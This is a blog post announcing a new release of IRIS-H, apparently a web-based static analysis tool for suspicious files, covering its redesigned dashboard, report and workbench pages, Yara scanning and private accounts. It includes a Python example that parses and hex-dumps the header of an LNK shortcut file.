<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>New UI</b></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">The IRIS-H UI has been completely re-written using <a href="https://github.com/akveo/nebular" rel="nofollow" target="_blank">Akveo</a> Nebular UI and the mighty power of Angular. While the content of the data views and service pages is mostly the same, their look has changed completely. Please see below for a detailed breakdown.</span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Dashboard (Home page)</b></span><br />
<span style="background-color: white; color: #666666; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQ5fNSvGeq2QQL6wRFCPvwJf77WJKMh4cxHE13cL97i7poP_vjAejjgLZtu09FwK5erdcFrApCpHKQJXZoRvSfUihd7kdi76zcHeKlg-ipZ1Otkof2ioQCpaw3bweBPb9FoVOfO_81i68/s1600/Screenshot+from+2018-08-06+16-31-58.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" data-original-height="826" data-original-width="1600" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiwQ5fNSvGeq2QQL6wRFCPvwJf77WJKMh4cxHE13cL97i7poP_vjAejjgLZtu09FwK5erdcFrApCpHKQJXZoRvSfUihd7kdi76zcHeKlg-ipZ1Otkof2ioQCpaw3bweBPb9FoVOfO_81i68/s320/Screenshot+from+2018-08-06+16-31-58.png" width="320" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;">IRIS-H Dashboard View</span></td></tr>
</tbody></table>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The dashboard now performs 3 functions:</span><br />
<br />
<ul>
<li><span style="font-family: "trebuchet ms" , sans-serif;">overall submitted data view</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">system health display</span></li>
<li><span style="font-family: "trebuchet ms" , sans-serif;">filters for currently loaded data</span></li>
</ul>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">While the overall submitted data and system health views are self-explanatory, the data filter functionality is explained below.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Each statistical data view panel is interactive. Clicking on a pie chart section or a bar filters the 'Submissions' table view. For example, clicking the 'Malicious OLE' bar in the 'Object Linking & Embedding' panel changes the 'Submissions' table view to display only reports for malicious OLE files.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgiAox-5VXkJ-6hdqA0sg_WndeMTJZxYwYn8h9kxchmO7iCJN543iGPYqvhjJV84niQHTqSxKoHZZon0dj4whc0XccPCKqcx7SxuNMWi5fgtFUITnCgRl6OG-KsOsteErRn1-RGxIz11jD/s1600/Screenshot+from+2018-08-06+16-56-11.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><span style="font-family: "trebuchet ms" , sans-serif;"><img border="0" data-original-height="278" data-original-width="232" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjgiAox-5VXkJ-6hdqA0sg_WndeMTJZxYwYn8h9kxchmO7iCJN543iGPYqvhjJV84niQHTqSxKoHZZon0dj4whc0XccPCKqcx7SxuNMWi5fgtFUITnCgRl6OG-KsOsteErRn1-RGxIz11jD/s1600/Screenshot+from+2018-08-06+16-56-11.png" /></span></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "trebuchet ms" , sans-serif;">Filtering 'Submissions' table view using Dashboard submitted data panel</span></td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: The filters apply only to the data already loaded into the dashboard, i.e. the 50 latest submissions.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">The data displayed in the dashboard depends on the user type (Public / Registered). There is now a concept of 'Public' and 'Private' data: file analysis data is tied to the user account the file was submitted under.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Public data</b> - file analysis reports generated under the 'Public User' account (not logged in).</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b>Private data</b> - file analysis reports generated under a logged-in user account.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<b><span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;">Submission Page</span></b></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The submission page hasn't changed much in terms of content and functionality.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvof6EHk89VlTnmIvDfqxaTNolRcTkwnMemD-lAlVqV3UhJn4yW3o2RspreZ95BFScpGLHXsB_G6hn_-SCoDLkhiIOp-rcpGMtNPgX7J2ZmVQwTFFDgnWSrr2C5ZeDGaZMVZ4Z_nD9seBC/s1600/Screenshot+from+2018-08-06+18-19-50.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="808" data-original-width="1600" height="161" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvof6EHk89VlTnmIvDfqxaTNolRcTkwnMemD-lAlVqV3UhJn4yW3o2RspreZ95BFScpGLHXsB_G6hn_-SCoDLkhiIOp-rcpGMtNPgX7J2ZmVQwTFFDgnWSrr2C5ZeDGaZMVZ4Z_nD9seBC/s320/Screenshot+from+2018-08-06+18-19-50.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Submission Page</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The page now includes a submission type indicator (Public / Private).</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2i3VUsdiIX40DgSHogzwgjOYLDGi8jcKswsas3Ixo7fXmiI9Rm3rX-mcj3p_qEh62rwbIwF4oSgQbXbhQw2WLJzQN7wMyKbvSQlEwTPKSzIabJWo1hYhnwnv7A_KmCmoaYJ6UyU-Bxkro/s1600/Screenshot+from+2018-08-06+18-23-15.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="71" data-original-width="390" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg2i3VUsdiIX40DgSHogzwgjOYLDGi8jcKswsas3Ixo7fXmiI9Rm3rX-mcj3p_qEh62rwbIwF4oSgQbXbhQw2WLJzQN7wMyKbvSQlEwTPKSzIabJWo1hYhnwnv7A_KmCmoaYJ6UyU-Bxkro/s320/Screenshot+from+2018-08-06+18-23-15.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H submission type indicator - Public</td></tr>
</tbody></table>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2BxMshvuBBfWwna5NBaP6iqReZZFJGJxCnVVYhgW1io7PgzwvH_SmQNh73BoSnrCaK3nXlMrhQCV4rTpHXs5dzuVH3GGQynFPkFt7_CsS12EElCYtq5or3RWXDiNzuqSOys4Sgy8Bvi5r/s1600/Screenshot+from+2018-08-06+19-11-54.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="64" data-original-width="369" height="55" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2BxMshvuBBfWwna5NBaP6iqReZZFJGJxCnVVYhgW1io7PgzwvH_SmQNh73BoSnrCaK3nXlMrhQCV4rTpHXs5dzuVH3GGQynFPkFt7_CsS12EElCYtq5or3RWXDiNzuqSOys4Sgy8Bvi5r/s320/Screenshot+from+2018-08-06+19-11-54.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H submission type indicator - Private</td></tr>
</tbody></table>
<div>
<b style="color: #3d85c6; font-family: "Trebuchet MS", sans-serif; font-size: small;">Report Page</b></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The content displayed on the report page has been re-worked and the majority of the generic information has been removed.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTd1foylOJG1X-V9asKCQcEBjN7EaCLzl1Rx8MrNHXZshtGw9taxxPoW2QJ2vS9kM28cTNC0cvjsEOvEjUL_u6Ndg6hTloM3gGfbLTqd0TwL7BlZz3hmGkOh6DPG19sPTRX2LGMv9jejM0/s1600/Screenshot+from+2018-08-06+18-30-29.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="821" data-original-width="1600" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTd1foylOJG1X-V9asKCQcEBjN7EaCLzl1Rx8MrNHXZshtGw9taxxPoW2QJ2vS9kM28cTNC0cvjsEOvEjUL_u6Ndg6hTloM3gGfbLTqd0TwL7BlZz3hmGkOh6DPG19sPTRX2LGMv9jejM0/s320/Screenshot+from+2018-08-06+18-30-29.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report page example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The report page now supports displaying multiple reports in separate report page tabs. While the same result can be achieved by opening separate tabs in the browser, this feature serves as a convenient alternative.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5h48xbIdmk28JAkMYbAyVnATEBOY3PefwHdekJXPLgUyCAAbRwq2zukw7ouS3u1K30B_dYpy2ee-9isWBeoWGO9gABb0CkU4zRmphyphenhyphenhnLXs6x5H9e7f80dv1HWkEi22Y1JhjfQfkX1TVP/s1600/Screenshot+from+2018-08-06+18-35-13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="231" data-original-width="717" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi5h48xbIdmk28JAkMYbAyVnATEBOY3PefwHdekJXPLgUyCAAbRwq2zukw7ouS3u1K30B_dYpy2ee-9isWBeoWGO9gABb0CkU4zRmphyphenhyphenhnLXs6x5H9e7f80dv1HWkEi22Y1JhjfQfkX1TVP/s320/Screenshot+from+2018-08-06+18-35-13.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report page - tabs view example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: The memory consumed by the tool depends on the number of reports opened at the same time. Use the browser's page refresh to close all report tabs except the currently active one.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>Workbench Page</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Workbench is a new data view type added in this release. It can be accessed through the 'Report' page navigation sub-menu, or through the main interface side bar once any workbench data is loaded.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxfS6NvT0IfTvRvDzHPL6FYf9GMy4RXE7CkuaBtlS6clZoE8L4uV1q50TBeaIcB9TJ7m12E_Av_A8HmvdPrFmWkBCXvkRFs_5ABMMyoSt8cxrpxCa5Z9s1Sndw8hcuHR8Nrd-Scb5CdoyJ/s1600/Screenshot+from+2018-08-06+19-02-09.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="318" data-original-width="235" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjxfS6NvT0IfTvRvDzHPL6FYf9GMy4RXE7CkuaBtlS6clZoE8L4uV1q50TBeaIcB9TJ7m12E_Av_A8HmvdPrFmWkBCXvkRFs_5ABMMyoSt8cxrpxCa5Z9s1Sndw8hcuHR8Nrd-Scb5CdoyJ/s1600/Screenshot+from+2018-08-06+19-02-09.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Access 'Workbench' view from 'Report' page</td></tr>
</tbody></table>
<div>
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The 'Workbench' page allows browsing the submitted file's content through its structural view. The file content is displayed in HEX and ASCII formats.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL3SzGCB5j7lgkVuNWjks_1F2BVAil7qp8t5_59z5rv8XO5MVzOiH72JpNyCW2ichiqT7BBzFU-Lt03gyZgUQlJMTrRELV3LHjyaCq_vIkEjxIl6YNjN8-lQOw-MSXtkC-60Oq3RAqAdJ3/s1600/Screenshot+from+2018-08-06+18-49-59.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="822" data-original-width="1600" height="164" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgL3SzGCB5j7lgkVuNWjks_1F2BVAil7qp8t5_59z5rv8XO5MVzOiH72JpNyCW2ichiqT7BBzFU-Lt03gyZgUQlJMTrRELV3LHjyaCq_vIkEjxIl6YNjN8-lQOw-MSXtkC-60Oq3RAqAdJ3/s320/Screenshot+from+2018-08-06+18-49-59.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Workbench Page example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Both the 'File Structure' tree view on the left-hand side and the HEX view of the data are interactive. When an entry in the tree view is selected, the corresponding HEX and ASCII data is scrolled into view. The HEX view works the same way, except that it does not scroll.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTDxN3ccFJblIwMEdt0NazQApdSGSTNHxxmvopRxaZIE_wznL_TZWI1ORfmqVNpuNzvi8sXb9z4afeVoyVihQObRfHlNwXR9ws5b3a5NCVBGQYpX8_MGqf2goriyJNzeZIMLBSp9-oiXa/s1600/Screenshot+from+2018-08-06+18-52-52.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="460" data-original-width="1600" height="92" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPTDxN3ccFJblIwMEdt0NazQApdSGSTNHxxmvopRxaZIE_wznL_TZWI1ORfmqVNpuNzvi8sXb9z4afeVoyVihQObRfHlNwXR9ws5b3a5NCVBGQYpX8_MGqf2goriyJNzeZIMLBSp9-oiXa/s320/Screenshot+from+2018-08-06+18-52-52.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Workbench Page - file content browsing example</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span><span style="font-family: "trebuchet ms" , sans-serif;">On each tree or HEX view interaction, the content of the 'Description' panel on the right-hand side is updated with the corresponding data description as per the official file format specification.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<span style="font-family: "trebuchet ms" , sans-serif;">A download function is available for each individual file component as well as for the submitted file itself. The 'Download' button can be found on the right-hand side of each workbench panel header.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><b><u>NOTE</u></b>: This feature is currently available for files in 'Shell Link Binary' format (LNK) only.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
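<div>
<span style="font-family: "trebuchet ms" , sans-serif;">To make the workbench idea concrete for the one format it currently supports, the Python below is an added example and not IRIS-H's own code. It builds the 'File Structure' entries for the fixed-size ShellLinkHeader that opens every LNK file (field names, sizes and order as in the MS-SHLLINK specification), renders the HEX/ASCII rows a viewer would scroll to for a selected entry, and produces the description text for that entry. The 76-byte sample header is constructed in the code and is not taken from any real file; the description strings are the author's paraphrase of the specification, not quotations from it. Input that does not carry the required HeaderSize and LinkCLSID is rejected rather than displayed as a tree.</span></div>

```python
"""A structural view of a Shell Link (LNK) header: tree entries, HEX/ASCII dump, descriptions."""
import struct
import uuid
from datetime import datetime, timedelta, timezone

# ShellLinkHeader layout (MS-SHLLINK 2.1): name, size in bytes, description shown for the entry.
HEADER_FIELDS = [
    ("HeaderSize", 4, "size of this header, must be 0x0000004C"),
    ("LinkCLSID", 16, "class identifier, must be 00021401-0000-0000-C000-000000000046"),
    ("LinkFlags", 4, "bit flags announcing which optional structures follow the header"),
    ("FileAttributes", 4, "file system attributes of the link target"),
    ("CreationTime", 8, "FILETIME when the target was created (0 = not set)"),
    ("AccessTime", 8, "FILETIME when the target was last accessed (0 = not set)"),
    ("WriteTime", 8, "FILETIME when the target was last written (0 = not set)"),
    ("FileSize", 4, "low 32 bits of the target file size"),
    ("IconIndex", 4, "index of the icon within the icon location"),
    ("ShowCommand", 4, "window state requested for the target, 1 = SW_SHOWNORMAL"),
    ("HotKey", 2, "keystroke assigned to launch the target"),
    ("Reserved1", 2, "must be zero"),
    ("Reserved2", 4, "must be zero"),
    ("Reserved3", 4, "must be zero"),
]
HEADER_SIZE = 0x4C
LINK_CLSID = uuid.UUID("00021401-0000-0000-C000-000000000046")


def structure_tree(data):
    """Return (name, offset, size, description) per header field; reject non-LNK input."""
    if len(data) < HEADER_SIZE:
        raise ValueError("shorter than a ShellLinkHeader")
    size, = struct.unpack_from("<I", data, 0)
    if size != HEADER_SIZE or uuid.UUID(bytes_le=bytes(data[4:20])) != LINK_CLSID:
        raise ValueError("HeaderSize/LinkCLSID do not match a Shell Link header")
    entries, offset = [], 0
    for name, width, desc in HEADER_FIELDS:
        entries.append((name, offset, width, desc))
        offset += width
    return entries


def filetime_to_iso(ft):
    """FILETIME counts 100 ns intervals since 1601-01-01 UTC."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return (epoch + timedelta(microseconds=ft // 10)).isoformat()


def describe(data, entry):
    """Text for the 'Description' panel when a tree entry is selected."""
    name, offset, size, desc = entry
    raw = bytes(data[offset:offset + size])
    if name == "LinkCLSID":
        value = str(uuid.UUID(bytes_le=raw))
    elif name.endswith("Time"):
        ft, = struct.unpack("<Q", raw)
        value = "not set" if ft == 0 else filetime_to_iso(ft)
    elif size == 2:
        value = hex(struct.unpack("<H", raw)[0])
    else:
        value = hex(struct.unpack("<I", raw)[0])
    return f"{name} @ 0x{offset:02X} ({size} bytes): {value} - {desc}"


def hex_ascii(data, offset, size, width=16):
    """HEX + ASCII rows for the selected slice, the part a hex viewer scrolls into view."""
    chunk = data[offset:offset + size]
    rows = []
    for i in range(0, len(chunk), width):
        row = chunk[i:i + width]
        hexpart = " ".join(f"{b:02x}" for b in row).ljust(width * 3 - 1)
        text = "".join(chr(b) if 32 <= b < 127 else "." for b in row)
        rows.append(f"{offset + i:08x}  {hexpart}  {text}")
    return "\n".join(rows)


UNIX_EPOCH_FILETIME = 116444736000000000  # 1970-01-01T00:00:00Z expressed as a FILETIME


def build_sample_lnk():
    """Constructed 76-byte header (not from any real file): LinkFlags 0x3, normal attributes."""
    return (struct.pack("<I", HEADER_SIZE) + LINK_CLSID.bytes_le
            + struct.pack("<IIQQQIIIHHII", 0x3, 0x20, UNIX_EPOCH_FILETIME,
                          UNIX_EPOCH_FILETIME, UNIX_EPOCH_FILETIME, 0x1234, 0, 1, 0, 0, 0, 0))


if __name__ == "__main__":
    sample = build_sample_lnk()
    for entry in structure_tree(sample):
        print(describe(sample, entry))
    print(hex_ascii(sample, 0, HEADER_SIZE))
```

<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The optional structures that follow the header (LinkTargetIDList, LinkInfo, the StringData fields) are announced by LinkFlags and would be further branches of the same tree; they are left out here so that the example stays focused on the fixed part of the format.</span></div>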
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 13px;"><b>General UI features</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">Akveo Nebular UI offers many features to customize the interface look. All of the customization options are available through 'Settings' sub-menu located in the top right corner.</span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kv7k3pCHV1qv2ew4Gtf48NaJArBzfEKlBRVw0xa3PFnAf0est4EeYkBJgxxp5fPHC5WaRP-lYCL7MujUEtXGhKlOMCiGflYgjfHAsM7wU7bgW65sfcPg5OKrab24A7g-Ty5SHGX_oOD7/s1600/Screenshot+from+2018-08-06+19-29-14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="496" data-original-width="133" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9kv7k3pCHV1qv2ew4Gtf48NaJArBzfEKlBRVw0xa3PFnAf0est4EeYkBJgxxp5fPHC5WaRP-lYCL7MujUEtXGhKlOMCiGflYgjfHAsM7wU7bgW65sfcPg5OKrab24A7g-Ty5SHGX_oOD7/s320/Screenshot+from+2018-08-06+19-29-14.png" width="85" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Interface customization settings</td></tr>
</tbody></table>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">While all of them are self-explanatory, I'd like to single out my favorite: UI Theme customization. It allows the interface theme to be changed on the fly. There are currently 3 themes available - light, cosmic and corporate. Corporate is the default, though my personal favorite is cosmic.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3k9HXNWzhsVP14RF-NxwpN3n_pBevfDw7stIZ2wzUynkqNVY8pZATH8Tuwk0vxqV6clt6w_h3sYhBWJVi5OkRGYwQ7Q7VA2P8HhzvAzLcu-EDYddf2FHUgVcVjz3ZFd4BsatAzz0GDi1t/s1600/Screenshot+from+2018-08-06+19-50-25.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="828" data-original-width="1600" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3k9HXNWzhsVP14RF-NxwpN3n_pBevfDw7stIZ2wzUynkqNVY8pZATH8Tuwk0vxqV6clt6w_h3sYhBWJVi5OkRGYwQ7Q7VA2P8HhzvAzLcu-EDYddf2FHUgVcVjz3ZFd4BsatAzz0GDi1t/s320/Screenshot+from+2018-08-06+19-50-25.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H with Cosmic UI Theme applied</td></tr>
</tbody></table>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>Yara Rules Support + 'External Intelligence'</b></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">This is a new addition to the static analysis engine: IRIS-H now scans submitted files, and the individual parts it extracts from them, with Yara rules. The scanning engine is based on the <a href="https://github.com/nospaceships/node-yara" rel="nofollow" target="_blank">node-yara</a> module developed by <a href="https://twitter.com/NoSpaceships" rel="nofollow" target="_blank">NoSpaceships</a>.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The current Yara rule set consists of the rules <a href="https://github.com/Neo23x0/signature-base/tree/master/yara" rel="nofollow" target="_blank">developed</a> and collected by <a href="https://twitter.com/cyb3rops" rel="nofollow" target="_blank">Florian Roth</a> for his Nextron Systems <a href="https://www.nextron-systems.com/compare-our-scanners/" rel="nofollow" target="_blank">scanners</a>.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The 'Report' page now includes a new section called 'External Intelligence & Automated Scanning' that displays any Yara matches.</span><br />
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimrC0e0l8YNVsnCpoqxwsUEbZVoKcr0_jhWjrkcFf7U8fIsy8I-D3TZXLR5rnzmNfaRmsXpxv7MzSMp_1wDZWbLlGaALw14YCUvSFy4Om7rI6BqsFMzryr_dn41MxEL-aS0yUL3Ete8nPy/s1600/Screenshot+from+2018-08-08+08-25-29.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="335" data-original-width="702" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEimrC0e0l8YNVsnCpoqxwsUEbZVoKcr0_jhWjrkcFf7U8fIsy8I-D3TZXLR5rnzmNfaRmsXpxv7MzSMp_1wDZWbLlGaALw14YCUvSFy4Om7rI6BqsFMzryr_dn41MxEL-aS0yUL3Ete8nPy/s320/Screenshot+from+2018-08-08+08-25-29.png" width="320" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">IRIS-H Report Page - Yara match example</td></tr>
</tbody></table>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div>
This section will also display information collected from external sources. This feature is currently under development.</div>
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;">Personal Service User Account</span></b></div>
<div>
<br /></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">IRIS-H now supports personal user accounts. Since this feature is still in testing, public registration is currently unavailable; however, user accounts can be provisioned on request (hit me up on Twitter).</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">The current personal account design provides the same features as the public account, with one exception: analysis report data is kept private and is available only to the user logged in with the account the submitted file was processed under.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;">There is no other difference in the feature set.</span></div>
<div>
<span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></div>
<div>
<span style="color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: 16px;"><b>GitHub Repository</b></span></div>
<div>
<br /></div>
<span style="font-family: "trebuchet ms" , sans-serif;">A <a href="https://github.com/malwageddon/iris-h" rel="nofollow" target="_blank">repository</a> has been created on GitHub to enable issue tracking. Issue reports and feature suggestions are much appreciated.</span><br />
<br />
<span style="background-color: white; color: #3d85c6; font-family: "trebuchet ms" , sans-serif; font-size: large;"><b>Credits</b></span><br />
<span style="background-color: white;"><span style="font-family: "trebuchet ms" , sans-serif;"><br /></span></span>
